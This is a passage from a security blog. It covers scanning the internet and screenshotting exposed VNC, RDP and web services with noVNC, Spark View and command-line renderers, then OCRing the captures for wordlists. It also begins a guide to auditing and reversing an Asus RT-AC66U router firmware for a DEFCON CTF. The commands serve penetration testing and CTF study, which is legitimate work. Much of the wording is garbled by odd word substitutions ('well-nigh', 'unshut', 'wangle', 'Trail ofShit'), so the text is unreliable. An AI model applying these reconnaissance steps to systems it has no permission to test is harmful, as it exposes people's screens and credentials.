style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-Uta0M4Ybd1c/VEnja48LkwI/AAAAAAAAAqA/D_MpotX6rnk/s1600/w00t.PNG" height="218" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>There are other solutions to this challenge, like <a href="http://tasteless.se/2014/10/hack-lu-ctf-2014-at-gunpoint/">this one from Tastless</a>. I'm still waiting for a write up from someone who unquestionably reversed and inputted the secret combination. Anyway, none of them are going to be as elegant as the one from <a href="https://twitter.com/angealbertini">@angealbertini</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-CzZfd3qcj5w/VEnZsoLzi_I/AAAAAAAAApc/WIsBdtP-DtE/s1600/ange.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CzZfd3qcj5w/VEnZsoLzi_I/AAAAAAAAApc/WIsBdtP-DtE/s1600/ange.PNG" height="75" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-tQz8rPuH-Jo/VEnZyh3ammI/AAAAAAAAApk/gZISApO65H0/s1600/ange2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-tQz8rPuH-Jo/VEnZyh3ammI/AAAAAAAAApk/gZISApO65H0/s1600/ange2.PNG" height="212" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com0tag:blogger.com,1999:blog-3296471108082693838.post-30919076036102452982014-08-17T13:00:00.000-03:002014-08-22T01:56:46.617-03:00Scan the Internet & Screenshot All the ThingsDuring Defcon 22, <a href="https://twitter.com/erratarob">@ErrataRob</a>, <a href="https://twitter.com/paulm">@paulm</a> and <a href="https://twitter.com/viss">@Viss</a> (mass)scanned the Internet and presented some <a href="https://www.defcon.org/html/defcon-22/dc-22-speakers.html#Graham">Tips, Tricks and Results</a>. Lots of people confronted <a href="https://twitter.com/viss">@Viss</a> without he posted some <a href="https://twitter.com/Viss/media">VNC screenshots on his Twitter timeline</a>. He posted a <a href="http://atenlabs.com/blog/scanning-the-whole-internet/">follow-up vendible on his blog</a>&nbsp;and Kashmir Hill, from Forbes, wrote an <a href="http://www.forbes.com/sites/kashmirhill/2014/08/13/so-many-pwns/">article</a> well-nigh the exposed VNC services.<br /><br />Internet scanning isn't new anymore and people are still surprised with these results. For this post, I'll share some techniques I wontedly use to map and screenshot several Internet services during pentest engagements. All this could hands be well-timed for other protocols and services, so let's start to Screenshot All the Things.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XMkkF3bNJr4/U-_KH8dTsOI/AAAAAAAAAlM/qleJT1yBBfQ/s1600/16284207.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XMkkF3bNJr4/U-_KH8dTsOI/AAAAAAAAAlM/qleJT1yBBfQ/s1600/16284207.jpg" height="240" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><b>VNC</b><br /><br />The easiest way to snapshot these services is to use preexisting tools and script/mod them equal to your needs. In order to take screenshots from VNC, I often use <a href="https://kanaka.github.io/noVNC/">noVNC</a> (an HTML5 VNC client) and a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">command line utility to capture the WebKit's rendering of a web page</a>.<br /><br />The process is pretty straightforward:<br /><br />1 - Clone the noVNC project from <a href="https://github.com/kanaka/noVNC">github</a>:<br /><br /><div class="code">git clone git://github.com/kanaka/noVNC</div><br />2 - Start the mini-webserver and specify the location of the VNC server you want to screenshot:<br /><br /><div class="code">./noVNC/utils/launch.sh --vnc 192.168.1.142:5900</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ESph1VwLdJE/U-_drKFnIpI/AAAAAAAAAlc/RBWWYFngCwM/s1600/111.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ESph1VwLdJE/U-_drKFnIpI/AAAAAAAAAlc/RBWWYFngCwM/s1600/111.png" height="261" width="400" /></a></div><br />3 - Take a <a href="http://www.binarytides.com/take-webpage-screenshot-from-command-line-in-ubuntu-linux/">webpage screenshot</a> from writ line using <a href="http://cutycapt.sourceforge.net/">CutyCapt</a>, for example:<br /><br /><div class="code">cutycapt --url="http://127.0.0.1:6080/vnc_auto.html" --javascript=on --out=vnc.png --delay=3000</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9yv3XKSIjDo/U-_dvUIV7UI/AAAAAAAAAlk/zRjus4uSQ-I/s1600/Screenshot%2Bfrom%2B2014-08-16%2B19%5E6%5E%01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-9yv3XKSIjDo/U-_dvUIV7UI/AAAAAAAAAlk/zRjus4uSQ-I/s1600/Screenshot%2Bfrom%2B2014-08-16%2B19%5E%36%5E%01.png" height="345" width="400" /></a></div><br />4 - Profit!!!<br /><br />Now all you have to do is masscan the target for ports 5900-5910 (used by VNC), save the results on a text file and create a simple script to take the screenshots. You can moreover try <a href="https://github.com/shamun/vncsnapshot">vncsnapshot</a>, used by <a href="https://twitter.com/paulm">@paulm</a> during his <a href="https://github.com/PaulMcMillan/toorcon_2013">Toorcon 2013 talk</a>.<br /><br /><b>RDP</b><br /><br />My tool of nomination for taking snapshots of RDP services is <a href="http://www.remotespark.com/">Spark View</a>. There's an <a href="http://www.remotespark.com/html5.html">HTML5 version</a> for the tool misogynist <a href="http://www.remotespark.com/html5.html">here</a>&nbsp;and the process is quite similar to the VNC one:<br /><br />1 - Download and install Spark View for <a href="http://www.remotespark.com/view/SparkGateway-installer.exe">Windows </a>or <a href="http://www.remotespark.com/view/SparkGateway.zip">Linux</a>. Follow the procedure from the <a href="http://www.remotespark.com/view/AdminManual.pdf">Admin Manual</a>, install J2SE JDK, set the&nbsp;JAVA_HOME environment variable, extract, configure and compile the utils from commons-daemon-native.tar.gz. On Debian derivatives, you may need to edit <i>SparkGateway.sh</i> and transpiration the source function library to "/lib/lsb/init-functions".<br /><br />2 - Start the service (./SparkGateway.sh start) and test it by accessing your local IP on port 80. Remote Spark provides a live demo for their solution <a href="http://www.remotespark.com:8080/">here</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-aOdmqeIl27E/U-_y0oFNhzI/AAAAAAAAAl0/_K_7i9dIbD0/s1600/rdp1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-aOdmqeIl27E/U-_y0oFNhzI/AAAAAAAAAl0/_K_7i9dIbD0/s1600/rdp1.png" height="244" width="320" /></a></div><br />3 - Specify the RDP server settings on the querystring and take a webpage screenshot using a writ line tool. I'm going to use <a href="http://phantomjs.org/">phantomjs</a> + <a href="https://gist.github.com/sbehrens/11384864">url-to-image.js</a> for this example:<br /><br /><div class="code">phantomjs url-to-image.js "http://127.0.0.1/rdpdirect.html?gateway=127.0.0.1&amp;server=192.168.1.189&amp;width=800&amp;height=600&amp;color=16" rdp.png 800 600</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-5lUfvUgFZqA/U-_y0szIDOI/AAAAAAAAAl4/pJelkMjPJyk/s1600/rdp2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-5lUfvUgFZqA/U-_y0szIDOI/AAAAAAAAAl4/pJelkMjPJyk/s1600/rdp2.png" height="366" width="400" /></a></div><br />4 - Profit!!!<br /><br />Some commercial tools like Nessus moreover connects to RDP services and&nbsp;<a href="http://www.tenable.com/blog/nessus-52-released">captures screenshots</a>.&nbsp;Taking screenshots from RDP services is very useful to fingerprint operating systems and to map/identify domains and users on the network. I unchangingly output these images to <a href="https://help.ubuntu.com/community/OCR">OCR</a>&nbsp;tools like <a href="https://code.google.com/p/tesseract-ocr/">tesseract</a> and <a href="http://jocr.sourceforge.net/">gocr</a> in order to generate wordlists and compile other useful data:<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-v_sz3McErGs/U-_7_7A336I/AAAAAAAAAmM/Fps_8Y9cgyo/s1600/ocr1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-v_sz3McErGs/U-_7_7A336I/AAAAAAAAAmM/Fps_8Y9cgyo/s1600/ocr1.png" height="260" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">RDP screenshot</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/-5bfR02dY7Vw/U-_8C29XP6I/AAAAAAAAAmU/vzWWhvK7L_4/s1600/ocr2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/-5bfR02dY7Vw/U-_8C29XP6I/AAAAAAAAAmU/vzWWhvK7L_4/s1600/ocr2.png" height="157" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">gocr output</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://1.bp.blogspot.com/-RZ25pqtfRt0/U-_8GH7a15I/AAAAAAAAAmc/gFvL5ffD14Y/s1600/ocr3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://1.bp.blogspot.com/-RZ25pqtfRt0/U-_8GH7a15I/AAAAAAAAAmc/gFvL5ffD14Y/s1600/ocr3.png" height="185" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">tesseract output</td></tr></tbody></table><br /><b>HTTP</b><br /><b><br /></b>There's nothing much to be said well-nigh Web Services screenshots. There are lots of posts tent this topic and lots of variegated tools, including an Nmap plugin. Some references:<br /><br />- <a href="http://blog.spiderlabs.com/2012/06/using-nmap-to-screenshot-web-services.html">Using Nmap to Screenshot Web Service (http-screenshot.nse</a>)<br />-&nbsp;<a href="http://wiki.securityweekly.com/wiki/index.php/Episode295">PaulDotCom Security Weekly 295 - Tech Segment</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MJMK3I-eERs/U_AGRHFPLII/AAAAAAAAAnA/pvl86mSJrZo/s1600/nmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-MJMK3I-eERs/U_AGRHFPLII/AAAAAAAAAnA/pvl86mSJrZo/s1600/nmap.png" height="143" width="400" /></a></div><br />-&nbsp;<a href="https://www.christophertruncer.com/eyewitness-triage-tool/">EyeWitness - A WebUsingTriage and Info-Gathering Tool</a><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-GPy_NHTjlXM/U_AABTb0W5I/AAAAAAAAAmo/7HByPddgRd4/s1600/EyeWitnessUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-GPy_NHTjlXM/U_AABTb0W5I/AAAAAAAAAmo/7HByPddgRd4/s1600/EyeWitnessUI.png" height="131" width="400" /></a></div><br /><b>Conclusion</b><br /><b><br /></b>I find these tips very useful to get a largest view of network services. Now that reporters are getting a pretty good idea from the attackers perspective, you have no excuse to leave your <a href="https://twitter.com/semibogan/status/499787869066498048">curtains exposed</a> to the Internet without a VNC password. It's moreover important to practice unscratched computing, waffly default passwords and enabling <a href="https://en.wikipedia.org/wiki/Network_Level_Authentication">Network Level Authentication</a>&nbsp;for RDP services.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1xwkCwfLAlw/U_AB4BYDTAI/AAAAAAAAAm0/xF77ZcBNLcA/s1600/movie.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-1xwkCwfLAlw/U_AB4BYDTAI/AAAAAAAAAm0/xF77ZcBNLcA/s1600/movie.PNG" height="383" width="400" /></a></div>Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com4tag:blogger.com,1999:blog-3296471108082693838.post-8598191646440899862014-07-17T11:03:00.000-03:002014-07-21T11:49:10.685-03:00Hacking Asus RT-AC66U and Preparing for SOHOpelesslyBroken CTFSo it's finally July, time to pack for DEFCON, follow <a href="https://twitter.com/defconparties">@defconparties</a> on Twitter and decide which <a href="http://defcne.net/villages/22">villages</a>&nbsp;to visit and which <a href="https://www.defcon.org/html/defcon-22/dc-22-schedule.html">talks</a> to attend.<br /><br />There's a new hacking competition this year tabbed <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken</a>, presented by ISE and EFF. The objective on&nbsp;<a href="http://sohopelesslybroken.com/track0.php">Track 0</a> is to demonstrate previously unidentified vulnerabilities in off-the-shelf consumer wireless routers. <a href="http://sohopelesslybroken.com/track1.php">Track 1</a>&nbsp;will hold a live CTF for the elapsing of DEFCON. CTFs are unchangingly fun and this races involves hacking real embedded devices, what makes it plane increasingly fun.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://2.bp.blogspot.com/---dhUkhmQuU/U8H-IO713pI/AAAAAAAAAdQ/HpeQJpqtIY0/s1600/meme2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://2.bp.blogspot.com/---dhUkhmQuU/U8H-IO713pI/AAAAAAAAAdQ/HpeQJpqtIY0/s1600/meme2.png" height="304" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Yes, that's my workstation =P</td></tr></tbody></table>I'm particularly interested on the <a href="https://openwireless.org/">EFFUnshutWireless Router</a>, but they didn't unroll details well-nigh the device yet.Equalto the <a href="http://sohopelesslybroken.com/track0.php">event rules</a>, the <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">ASUS RT-AC66U</a> (HW Ver. A2) [Version 3.0.0.4.266] is one of the possible targets. As I had a spare RT-AC66U at home, I decided to write a quick guide for everyone interested in participating in this <strike>competition</strike> CTF.<br /><br /><b>recon</b><br /><br />The first thing to do is to find the firmware and its source code. Hopefully, Asus RT-AC66U is GPL'ed and we can hands find its source online. The version used for the races is an old one, from 2012. In order to perform a largest analysis, we are going to grab the sources and the firmware from v3.0.0.4.266 and v3.0.0.4.376.1123 (the most recent one as of this writing).<br /><br /><ul><li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/FW_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266&nbsp;- Firmware</a></li><li><a href="http://ftp.tekwind.co.jp/pub/asustw/wireless/RT-AC66U/GPL_RT_AC66U_VER3004266.zip">Asus RT-AC66u v3.0.0.4.266&nbsp;- Source Code</a></li><li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/FW_RT_AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Firmware</a></li><li><a href="http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC66U/GPL_RT-AC66U_30043761123.zip">Asus RT-AC66u v3.0.0.4.376.1123 - Source Code</a></li></ul><br />Many firmware versions were published between these two releases, we can review the changelogs to find security issues:<br /><br /><ul><li><a href="http://www.asus.com/Networking/RTAC66U/HelpDesk_Download/">http://www.asus.com/Networking/RTAC66U/HelpDesk_Download</a></li></ul><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-wjERjTKfWVs/U8HfLIzk1XI/AAAAAAAAAb8/AQcXTFCbmsY/s1600/sec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-wjERjTKfWVs/U8HfLIzk1XI/AAAAAAAAAb8/AQcXTFCbmsY/s1600/sec1.png" height="235" width="400" /></a></div><br />According to the rules, we have to identify and exploit a 0-day vulnerability. We can combine variegated flaws with known issues in order to score points. If the vendor had silently patched an issue and you create an exploit for it, that should be scored as a valid 0-day (I'm not going to start discussing terminologies here).<br /><br />Now that we have the source code, it's time to pericope and inspect it: The&nbsp;<a href="https://trailofbits.github.io/ctf">CTF Field Guide</a>&nbsp;from Trail ofShithas some good resources on <a href="https://trailofbits.github.io/ctf/vulnerabilities/source.html">Auditing Source Code</a>. You can use tools like <a href="http://www.scootersoftware.com/">Beyond Compare</a>, <a href="http://www.araxis.com/merge/">Araxis Merge</a> and&nbsp;<a href="http://winmerge.org/">WinMerge</a>&nbsp;on Windows platforms or&nbsp;<a href="http://meldmerge.org/">Meld</a> if you're increasingly of a Linux user.<br /><br />Let's focus on the "/asuswrt/release/src/router/" directory, comparing these two folders using Meld:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_w86JGA7QGg/U8HwRCLopYI/AAAAAAAAAcM/xR2m1ctffTk/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-_w86JGA7QGg/U8HwRCLopYI/AAAAAAAAAcM/xR2m1ctffTk/s1600/Screenshot+from+2014-07-12+23%5E%2530%5E%2556.png" height="363" width="640" /></a></div><br />There are many security advisories for this router: if you want to find 0-days you should squint for disclosed vulnerabilities and exploits to stave duplicates (believe me, this is the hardest part). Some references:<br /><br /><ul><li><a href="http://infosec42.blogspot.com.br/2013/07/exploit-asus-rt-ac66u-remote-root.html">ASUS RT-AC66U Remote Root (Broadcom ACSD)</a></li><li><a href="http://www.securityfocus.com/archive/1/526942">ASUS RT-N66U Router - HTTPS Directory traversal and full file wangle and credential disclosure vuln</a></li><li><a href="https://hatriot.github.io/blog/2013/06/05/asus-rt56u-remote-command-injection/">Asus RT56U RemoteWritInjection</a></li><li><a href="http://securityevaluators.com/knowledge/case_studies/routers/asus_rtn56u.php">Taking over the ASUS RT-N56U and RT-AC66U</a></li><li><a href="http://arstechnica.com/security/2014/02/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw/">Dear Asus router user: You’ve been pwned, thanks to hands venal flaw (Asusgate)</a></li><li><a href="http://osvdb.com/search?search%5Bvuln_title%5D=asus&amp;search%5Btext_type%5D=alltext">OSVDB</a></li></ul><br />Points are deducted from your score if your exploits requires special system configurations and specific information. If you want to score lots of points, you should be targeting default services and processes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-iYIexFmeBy4/U8LACGtuJwI/AAAAAAAAAeg/yhKoXPP6Bvc/s1600/ps.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-iYIexFmeBy4/U8LACGtuJwI/AAAAAAAAAeg/yhKoXPP6Bvc/s1600/ps.PNG" height="330" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>The USB using tab on the RT-AC66U allows the user to set up a series of services like FTP, DLNA, NFS and Samba:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-0qykYBza9cA/U8K_8r5LPQI/AAAAAAAAAeU/2TU5c0BS_oc/s1600/media.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-0qykYBza9cA/U8K_8r5LPQI/AAAAAAAAAeU/2TU5c0BS_oc/s1600/media.PNG" height="272" width="400" /></a></div><br />MiniDLNA is moreover a nice a target. It should be pretty easy to find vulns for the service using <a href="https://twitter.com/zcutlip">Zachary Cutlip</a>'s <a href="http://shadow-file.blogspot.com.br/2014/05/infiltrate-2014.html">research</a>, as he tapped it multiple times.<br /><br /><a href="http://4.bp.blogspot.com/-wQ31rqFoSAM/U8XL7hTeLLI/AAAAAAAAAiQ/h8GxfHo6qMM/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://4.bp.blogspot.com/-wQ31rqFoSAM/U8XL7hTeLLI/AAAAAAAAAiQ/h8GxfHo6qMM/s1600/diff.png" height="363" width="640" /></a><br /><br />Another <strike>potentially</strike> vulnerable service is AiCloud: it links your home network to an online Web storage service and lets you wangle it through a mobile application:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wcURvLXQEhs/U8R5RdeRBDI/AAAAAAAAAes/gAHXtljWVBQ/s1600/aicloud.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-wcURvLXQEhs/U8R5RdeRBDI/AAAAAAAAAes/gAHXtljWVBQ/s1600/aicloud.PNG" height="330" width="400" /></a></div><br /><b>forensic</b><br /><br />While part of the team audits the source code, the forensics guys should be unpacking the firmware using binwalk + fmk:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FEc5AIge3Yk/U8SLJW9df6I/AAAAAAAAAe8/vZRu4RgGwrA/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-FEc5AIge3Yk/U8SLJW9df6I/AAAAAAAAAe8/vZRu4RgGwrA/s1600/1.png" height="138" width="400" /></a></div><br />You may remember <a href="https://github.com/bmaia/binwally">binwally</a>, the tool I ripened to <a href="http://w00tsec.blogspot.com/2013/12/binwally-directory-tree-diff-tool-using.html">perform binary tree unequal using fuzzy hashing</a>. Binwalk has its own option to <a href="https://github.com/devttys0/binwalk/blob/master/src/binwalk/modules/hashmatch.py">perform fuzzy hashing versus files and directories</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/--qerSGlsoCo/U8SLMzWKVnI/AAAAAAAAAfE/3V1fdYQR9l0/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/--qerSGlsoCo/U8SLMzWKVnI/AAAAAAAAAfE/3V1fdYQR9l0/s1600/2.png" height="250" width="400" /></a></div><br />Most vendors (like Asus) won't unshut source their unshortened lawmaking base. You may need to reverse proprietary drivers and binary blobs in order to find some good vulns. ACSD is a particularly interesting binary considering it was removed from newer firmwares (v3.0.0.4.374.130+) due to a <a href="http://infosec42.blogspot.com/2013/07/exploit-asus-rt-ac66u-remote-root.html">vuln</a> disclosed by <a href="https://twitter.com/rootHak42">Jacob Holcomb</a>:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OsJZw4CSdzM/U8IBgxOzDAI/AAAAAAAAAdc/UqNMQO97yoE/s1600/rem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-OsJZw4CSdzM/U8IBgxOzDAI/AAAAAAAAAdc/UqNMQO97yoE/s1600/rem.png" height="140" width="400" /></a></div><br />The binaries are MIPS and Little Edian:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Hq-8hd6sQH8/U8H1KPl_CWI/AAAAAAAAAcc/mUIJGKxNUU8/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Hq-8hd6sQH8/U8H1KPl_CWI/AAAAAAAAAcc/mUIJGKxNUU8/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" height="232" width="400" /></a></div><br />It's moreover important to learn increasingly well-nigh the filesystem. The OpenWRT Wiki has a nice <a href="http://wiki.openwrt.org/doc/techref/flash.layout">article onWinkLayouts</a>. The <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">MTD subsystem</a> for Linux provides wangle to wink devices, creating&nbsp;fully functional filesystems. SSH to the device and map the mount points and partitions:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-iyqGikqZwjQ/U8SOq7Dh_fI/AAAAAAAAAfQ/L52mPUOf3m0/s1600/fs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-iyqGikqZwjQ/U8SOq7Dh_fI/AAAAAAAAAfQ/L52mPUOf3m0/s1600/fs.PNG" height="212" width="400" /></a></div><br />The NVRAM partition is very valuable for us considering it stores all the configuration parameters. We can view its content by dumping the respective partition (mtd1) or by issuing the "<i>nvram show</i>" command:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-920-ai-sPGE/U8SSMlYLz_I/AAAAAAAAAfw/5ydBWlX6XBg/s1600/dd1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-920-ai-sPGE/U8SSMlYLz_I/AAAAAAAAAfw/5ydBWlX6XBg/s1600/dd1.PNG" height="85" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OI2GwR1aTCs/U8SSR-hZznI/AAAAAAAAAf4/-Qu8A35E5jw/s1600/dd2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-OI2GwR1aTCs/U8SSR-hZznI/AAAAAAAAAf4/-Qu8A35E5jw/s1600/dd2.PNG" height="156" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Another interesting partition is the bootloader (pmon). It has some LZMA compressed data and the marching process provides a failsafe mechanism to recover from a bad flash.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-kSYjDPsCdso/U8SWIUPVcLI/AAAAAAAAAgE/zf4JlplNROE/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kSYjDPsCdso/U8SWIUPVcLI/AAAAAAAAAgE/zf4JlplNROE/s1600/x1.png" height="273" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-g3KY4kojHcg/U8SWId0R5MI/AAAAAAAAAgI/Z0-sDvUI1HA/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-g3KY4kojHcg/U8SWId0R5MI/AAAAAAAAAgI/Z0-sDvUI1HA/s1600/x2.png" height="333" width="400" /></a></div><br /><b>reverse</b><br /><div><b><br /></b>Time to start the reversing tasks. We need some vital tools like gdb, gdbserver and strace to start debugging the binaries: we could either navigate compile them or set up&nbsp;<a href="https://github.com/RMerl/asuswrt-merlin/wiki/Entware">Optware/Entware</a>&nbsp;to install prebuilt packages.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-KUsSUBQISOc/U8IJhskaX7I/AAAAAAAAAds/HIJ2y778pbY/s1600/gdb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-KUsSUBQISOc/U8IJhskaX7I/AAAAAAAAAds/HIJ2y778pbY/s1600/gdb.PNG" height="220" width="400" /></a></div><div><br />Wanduck (GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c) is an interesting process to analyze. It starts by default and binds a pseudo HTTP server on port 18017. The HTTP server redirects every request to the main legalistic interface and, for some reason, it drops requests to URL's ending with ".ico".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xCZ-gBnPqzQ/U8SkvxRMsyI/AAAAAAAAAgc/wF5HPBSEQ8o/s1600/wando1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-xCZ-gBnPqzQ/U8SkvxRMsyI/AAAAAAAAAgc/wF5HPBSEQ8o/s1600/wando1.png" height="321" width="400" /></a></div><br />Let's find out why: start gdbserver on the remote target (gdbserver --multi localhost:12345 &amp;) and connect to your debugger of choice. If you're using Ida Pro, unshut the binary "/sbin/wanduck" and set the processor type to "mipsrl".<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-mDpl8DfWr9o/U8SwAePeagI/AAAAAAAAAhQ/6TkI52piFbc/s1600/gdb2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-mDpl8DfWr9o/U8SwAePeagI/AAAAAAAAAhQ/6TkI52piFbc/s1600/gdb2.PNG" height="95" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>Navigate to the&nbsp;<i>handle_http_req</i>&nbsp;function and set a breakpoint on the <i>dst_url </i>comparison:<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-DMkLVIItF_U/U8Ss-lPl1MI/AAAAAAAAAg0/JXkonXDuCc4/s1600/wandox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-DMkLVIItF_U/U8Ss-lPl1MI/AAAAAAAAAg0/JXkonXDuCc4/s1600/wandox.png" height="435" width="640" /></a></div><div><br /></div><div>Enter the gdbserver's host and port under "Debugger / Process Options" and nail to the respective PID.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a 